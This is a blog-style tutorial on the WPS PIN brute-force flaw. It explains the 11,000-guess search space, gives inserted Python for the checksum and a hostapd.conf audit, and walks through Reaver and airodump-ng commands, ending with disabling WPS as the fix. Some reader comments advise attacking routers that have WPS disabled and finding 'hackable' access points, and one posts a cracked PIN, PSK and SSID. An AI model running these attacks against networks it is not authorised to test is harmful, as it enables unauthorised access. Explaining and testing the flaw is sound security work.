WiFi Protected Setup (or WPS) is designed to make life easier for the average user. In most cases the user presses a button on their wireless access point, which initiates an easy pairing sequence between the router and the client. If you have recently purchased a wireless router, chances are it has WPS, and it has probably been enabled by default.
Stefan worked out that the PIN exchanged between the router and client is only 8 digits long and that the last digit is a checksum, leaving 7 digits to brute force. To make matters worse, the router splits the 7 digits into two halves, one of 4 digits and one of 3, and worse again, it confirms each half independently. This means there are 10^4 + 10^3 possible combinations, or 11,000 in total.
Some routers have built-in protection that only allows a specific number of PIN attempts per period of time, but this only slows the attack; anyone willing to wait long enough will recover the pass phrase.
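To make the arithmetic above concrete, here is an added example (not code from the original post or from Reaver) that implements the WPS PIN check-digit calculation from the WPS specification and counts the search space it leaves. The rate-limit figures passed to worst_case_hours are assumed values for illustration, not measurements from any particular router.

```python
# Added example: WPS PIN checksum and the size of the resulting search space.
# The check digit is a weighted digit sum (weights 3 and 1, alternating from
# the right), as defined in the WPS specification.

def wps_pin_checksum(first7: int) -> int:
    """Return the check digit for the first 7 digits of a WPS PIN."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)   # odd positions (from the right) weigh 3
        pin //= 10
        accum += pin % 10         # even positions weigh 1
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN string carries a correct check digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_pin_checksum(int(pin[:7]))


def valid_second_halves(first4: str) -> list:
    """All 4-digit second halves that pass the checksum for a fixed first half.

    Digits 5-7 are free and digit 8 is forced by the checksum, so exactly
    1,000 of the 10,000 candidates survive, whatever the first half is.
    """
    return [f"{n:04d}" for n in range(10_000) if is_valid_wps_pin(first4 + f"{n:04d}")]


def worst_case_attempts(split_halves: bool = True) -> int:
    """PIN guesses needed to exhaust the space.

    split_halves=True models the flaw described above: the router confirms the
    first 4 digits and the last 4 independently, so the two halves add rather
    than multiply.
    """
    first_half = 10 ** 4
    second_half = len(valid_second_halves("0000"))   # computed, not assumed: 1000
    if split_halves:
        return first_half + second_half
    return first_half * second_half


def worst_case_hours(attempts_per_period: int, period_seconds: int,
                     split_halves: bool = True) -> float:
    """Hours to exhaust the space under a rate limit (assumed values)."""
    attempts = worst_case_attempts(split_halves)
    return attempts * period_seconds / attempts_per_period / 3600


if __name__ == "__main__":
    print(is_valid_wps_pin("12345670"))      # test PIN from the WPS specification
    print(worst_case_attempts())             # 11000
    print(worst_case_attempts(False))        # 10000000 without the split
    # Hypothetical lockout of 3 attempts per minute: the attack slows to
    # a few days, but it does not stop.
    print(round(worst_case_hours(3, 60), 1))
```

The PIN printed in the comments below (25210729) passes the check in is_valid_wps_pin, which is a quick way to confirm the weights are right.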
While Stefan was exploring this vulnerability, so were the good folks at Tactical Network Solutions, with their release of a brute force attack tool named reaver-wps. Reaver brute forces WPS PINs with the bold intention of recovering WPA/WPA2 pass phrases, so let's take a look.
Using Reaver
This tool is extremely easy to use; I recommend an RTL8187-based wireless adapter (you already have one of these for your WEP pen testing, right?).
1. Boot Backtrack 5, establish a network connection and install reaver.
apt-get install reaver
2. First, let's take a look at the available networks. I still use airodump-ng for this.
airodump-ng wlan0
3. After finding the BSSID you are interested in (the one you just set up for your proof of concept), issue the following reaver command, replacing "00:11:22:33:44:55" with your target BSSID and "wlan0" with your adapter.
reaver -i wlan0 -b 00:11:22:33:44:55 -c 1 -vv
The above command attacks BSSID "00:11:22:33:44:55" on interface "wlan0" and channel 1, with a high verbosity level.
You can see from the image that Reaver begins to brute force PIN combinations. This process can take hours; the Reaver website suggests it will take between 4 and 10 hours on average to recover a pass phrase. The particular AP I tested the attack against had some PIN rate limiting protection (as reported by Reaver) that significantly delays but doesn't stop the attack. I didn't leave the attack running for more than a few minutes, but you get the idea.
Fortunately there is a simple fix: disable WPS, or even better, move to WPA2-Enterprise with a RADIUS back end. With any luck the WiFi Alliance and associated manufacturers will release firmware updates quickly to resolve this issue, but for the time being millions of wireless access points remain vulnerable to this simple attack.
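As an added example of checking for the two fixes just mentioned (this is not code from the original post), the following audits a hostapd.conf for WPS being switched off and for WPA2-Enterprise (WPA-EAP with a RADIUS server) being in use. hostapd stands in here for whatever access point software you run; consumer routers expose the same switches in their web UI. Both configuration snippets are constructed for this example, and the RADIUS address is a documentation placeholder.

```python
# Added example: audit a hostapd.conf for the mitigations the post recommends.
# Relevant hostapd settings:
#   wps_state      0 (or absent) = WPS disabled, 1 = enabled/unconfigured,
#                  2 = enabled/configured
#   wpa_key_mgmt   WPA-PSK (pre-shared key) or WPA-EAP (802.1X / RADIUS)
#   auth_server_addr  address of the RADIUS server used for WPA-EAP

# Constructed weak configuration: PSK with WPS left on.
WEAK_CONF = """\
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=correct horse battery staple
# WPS is on and configured
wps_state=2
"""

# Constructed hardened configuration: WPA2-Enterprise, WPS off.
HARDENED_CONF = """\
interface=wlan0
ssid=HomeNet
wpa=2
# clients authenticate against a RADIUS server instead of a PIN or PSK
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# placeholder RADIUS address (TEST-NET-1); replace with your own server
auth_server_addr=192.0.2.10
auth_server_port=1812
auth_server_shared_secret=REPLACE_ME
# WPS disabled
wps_state=0
"""


def parse_hostapd_conf(text: str) -> dict:
    """Parse key=value lines; comment lines (#) and blank lines are ignored."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_hostapd(text: str) -> list:
    """Return a list of findings; an empty list means both fixes are in place."""
    cfg = parse_hostapd_conf(text)
    findings = []
    wps_state = cfg.get("wps_state", "0")   # hostapd default is disabled
    if wps_state != "0":
        findings.append(f"WPS is enabled (wps_state={wps_state}); set wps_state=0")
    key_mgmt = cfg.get("wpa_key_mgmt", "").split()
    if "WPA-PSK" in key_mgmt:
        findings.append("pre-shared key in use (wpa_key_mgmt=WPA-PSK); "
                        "consider WPA-EAP with a RADIUS back end")
    if "WPA-EAP" in key_mgmt and "auth_server_addr" not in cfg:
        findings.append("WPA-EAP selected but no auth_server_addr (RADIUS server) set")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_hostapd(conf) or "no findings")
```

Point audit_hostapd at the contents of a real hostapd.conf to get the same report; an absent wps_state is treated as disabled because that is hostapd's default.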
Don't you have to put your wireless card in monitor mode before issuing the reaver command?
Yeah mate, you're correct, you do, but airodump-ng automatically puts the card into monitor mode.
If you are using a separate interface for airodump-ng, or not using airodump-ng, you will need to issue an airmon-ng command:
airmon-ng start
for example: airmon-ng start wlan1 6
After entering the 'airmon-ng start wlan0' command, my machine just hangs and does not provide an interface/chipset/driver readout.
How can I install REAVER into Backtrack5.iso? I want to make a "turn key" BackTrack on my USB flash drive!
FYI: the WPS PIN is sometimes hard-coded into the router and cannot be changed, and even though the router has the WPS option turned off you can still attack it.
And if you are re-attacking the same router because of a password change, you only need to manually enter the WPS PIN into the reaver command to get the new WPA/WPA2 pass-phrase.
Enjoy :)
Also use the "wash -i mon0" command to find out which APs are hackable.
Hi, I would like to ask why it showed me the real password and showed me this:
Pin cracked in 11196 seconds
[+] WPS PIN: '25210729'
[+] WPA PSK: 'cd255b11b809c5f8eaca6c4b8ceff0110188fda4a35a61f1953a533cda0546f7'
[+] AP SSID: 'Rosennqmanet'